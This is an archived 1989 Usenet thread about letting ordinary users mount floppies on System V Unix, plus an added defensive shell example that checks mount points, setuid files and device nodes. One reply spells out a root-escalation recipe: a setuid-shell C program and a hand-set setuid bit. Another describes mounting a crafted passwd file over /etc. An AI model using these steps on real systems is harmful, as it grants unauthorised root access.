gulik@gagme.uucp (Gregory Gulik) (12/06/89)
Is it possible to set up a shell script that will
allow non-super-user people to mount a floppy file system?
I don't want to give users access to the root account,
but I want to allow them to mount a floppy.
I tried a script that contains the command to mount
the file system, and made that script setuid and setgid
to root.
Well, it doesn't work.
How should I be doing this?
By the way, this is a 3B2 running System V 3.2
-greg
--
Gregory A. Gulik
...!jolnet!gagme!greg || gagme!greg@jolnet.orpk.il.us
|| gulik@depaul.edu
merlyn@iwarp.intel.com (Randal Schwartz) (12/13/89)
In article <23@gagme.uucp>, gulik@gagme (Gregory Gulik) writes:
| Is it possible to set up a shell script that will
| allow non-super-user people to mount a floppy file system?

Yes... but...

| How should I be doing this?

... you shouldn't.  Mounting a trashed filesystem will take your system
down *real* fast.  I suppose you could run fsck on your to-be-mounted
floppy, and verify the exit status, but that sounds like a lot of work,
because it doesn't avoid the second problem... described as so:
(presume mountflop does an fsck followed by a mount, and umountflop
does the reverse).

$ newfs /dev/flop
$ mountflop
$ cd /flop
$ cat >x.c
main() { setuid(geteuid()); exec("/bin/sh","sh",0); }
^D
$ cc x.c -o x
$ cd /
$ umountflop
$ emacs /dev/flop
[find inode table, turn on setuid bit on ./x]
$ mountflop
$ /flop/x
# [a root shell]

Sorry.  It's too easy.  (C code deliberately untested for security
through obscurity.. :-)

Just another UNIX hacker,
--
/== Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095 ====\
| on contract to Intel's iWarp project, Hillsboro, Oregon, USA, Sol III  |
| merlyn@iwarp.intel.com ...!uunet!iwarp.intel.com!merlyn                |
\== Cute Quote: "Welcome to Oregon... Home of the California Raisins!" ==/
martin@mwtech.UUCP (Martin Weitzel) (12/14/89)
In article <5338@omepd.UUCP> merlyn@iwarp.intel.com (Randal Schwartz) writes:
>In article <23@gagme.uucp>, gulik@gagme (Gregory Gulik) writes:
>| Is it possible to set up a shell script that will
>| allow non-super-user people to mount a floppy file system?
>
>Yes... but...
[description of security hole deleted]

Several security holes occur if you allow everyone to mount a floppy
(more generally: a file system on removable media):

1) There may be root-suid/sgid files on the media, which allow intrusion
   into the system.  (The files may be produced in advance on some other
   system, where the intruder has root privileges.)  As far as I know,
   this problem was cured in very recent UNIX releases by *not* obeying
   the s-bits in file systems which were not mounted by the super-user.

2) There may be i-nodes that point to device files like /dev/mem or
   disk partitions.  This would also enable any bad guy to intrude into
   the system.  For the 'real unix hacker' everything is open then
   (even if he/she is originally locked in a chroot-ed environment!!).
   I don't know if this was fixed together with problem 1).

3) Because the mount command was not designed to be run setuid to root,
   it doesn't make any checks whether you have access rights to the
   mount point.  So you could carefully prepare a floppy with a file
   named 'passwd' containing the one line "a::0:0::/:" and mount it ....
   (guess where - and be sure also to include the unmount command :-))

To cure these problems, I've written a collection of shell scripts and
C programs which look at a file system on removable media with the same
accuracy as a system operator would (should) do before mounting some
floppy a user brings to him or her.  The programs take care of
unmounting too, so that a malicious user could not unmount some
resource at will.

If anyone out there is interested, I'm willing to email the programs.
I'll also consider posting them if I receive sufficient requests within
the next days.
-- <<< MW -- email: see header -- voice: 49-(0)6151-6 56 83 >>>
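The three checks Martin lists, as an added example that is not his programs nor any other code from this thread: POSIX sh functions a setuid-root "mountflop" front end could call before and after mounting a floppy read-only at a scratch point. FLOP_ROOT (the prefix under which per-user mount points live) is an assumed name, and the nosuid/nodev options are mentioned only where a system's mount supports them.

```sh
#!/bin/sh
# Added example, not code from the thread. Checks a setuid-root "mountflop"
# front end could run against a floppy before handing it to a user.
# Assumption: FLOP_ROOT is the directory under which per-user mount points live.
FLOP_ROOT=${FLOP_ROOT:-/mnt/flop}

# Problem 3: mount(1) does not check the mount point, so the wrapper must.
# Accept only a plain directory (no symlink, no ".." components) under
# FLOP_ROOT that is owned by the invoking user; /etc and friends are refused.
check_mount_point() {
    mp=$1 owner=$2
    case $mp in
        */..|*/../*) echo "refused: $mp contains .." >&2; return 1 ;;
        "$FLOP_ROOT"/*) ;;
        *) echo "refused: $mp is not under $FLOP_ROOT" >&2; return 1 ;;
    esac
    if [ -h "$mp" ] || [ ! -d "$mp" ]; then
        echo "refused: $mp is not a plain directory" >&2; return 1
    fi
    # find -prune -user is POSIX: prints the path only if the owner matches
    [ -n "$(find "$mp" -prune -user "$owner")" ] ||
        { echo "refused: $mp is not owned by $owner" >&2; return 1; }
}

# Problems 1 and 2: once the medium is mounted read-only at the scratch
# point (nosuid,nodev too, where the system's mount supports them), list the
# set-uid/set-gid files and the block/character device nodes it carried in.
list_unsafe_entries() {
    find "$1" \( -type b -o -type c -o -perm -4000 -o -perm -2000 \) -print
}

# Number of findings; a wrapper would unmount and refuse when this is not 0.
count_unsafe_entries() {
    list_unsafe_entries "$1" | wc -l | tr -d ' '
}
```

None of this helps if the medium is swapped after the scan and before the real mount; that window is inherent to removable media, not to the script.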
chris@mimsy.umd.edu (Chris Torek) (12/22/89)
In article <541@mwtech.UUCP> martin@mwtech.UUCP (Martin Weitzel) writes:
>Several security holes occur, if you allow to mount a floppy
>(more general: a file system on removable media) for everyone:
>1) There may be root-suid/sgid files on the media ...
>2) There may be i-nodes that point to device-files like /dev/mem ...
>3) ... the mount-command [does not check the mount point]

There is a fourth problem, which cannot be solved in software: If the
medium is removable, it can be removed after all the checking has
occurred, but in time to put the bad thing out there, or to crash the
system, etc.
--
In-Real-Life: Chris Torek, Univ of MD Comp Sci Dept (+1 301 454 7163)
Domain: chris@cs.umd.edu    Path: uunet!mimsy!chris